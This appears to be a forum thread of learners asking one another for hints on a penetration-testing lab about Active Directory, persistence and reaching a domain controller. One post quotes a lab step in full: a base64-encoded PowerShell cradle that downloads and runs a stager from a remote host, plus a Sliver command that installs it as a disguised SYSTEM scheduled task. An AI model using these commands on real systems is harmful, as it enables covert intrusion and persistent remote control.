I’ve been stuck on trying to access DC02 for days now. Anyone willing to give me a tip? I’ve rooted the foothold host and pulled all the hashes I could find. Got access to the Admin account, but it’s only the local admin. Can’t seem to gain access to the one I need to get to DC02.
I’m stuck in the same place. Have you figured it out yet?
I haven’t reached the Skills Assessment yet. I am lost in the “Assumed breach” section, “Establishing persistence” part.
It says “We will focus on the approach used in the Probing the surface
section by downloading a staged.txt
file”
[!bash!]$ echo -en "iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=
And then create a scheduled task like this:
sliver (http-beacon) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr \"powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=\" /ru SYSTEM'
I did as was written but never got a shell back. Please help!
If anyone needs help to get the third flag, feel free to hit me up.
I’m stuck at the last, If anyone have a hint, I’d appreciate
PS: I got it. Took me direct access to the host via pivot. You can also achieve it with generating a file and PtT.
bro can you give a hint to get a foothold from htb-student lol i am stuck at the beginning tried everything
Run Sharphound
bro i stuck at 3rd question can you help me like how did you privoted to dc02
can you give a hint please?
Did you find the script?
yeah and logged in to mssql server but i am havind a error like when i am trying uplaod a file to mssql server it freezes
bro i already hot a dc02 but can’t dump hashes always error like implant timeout and after that session closes by itself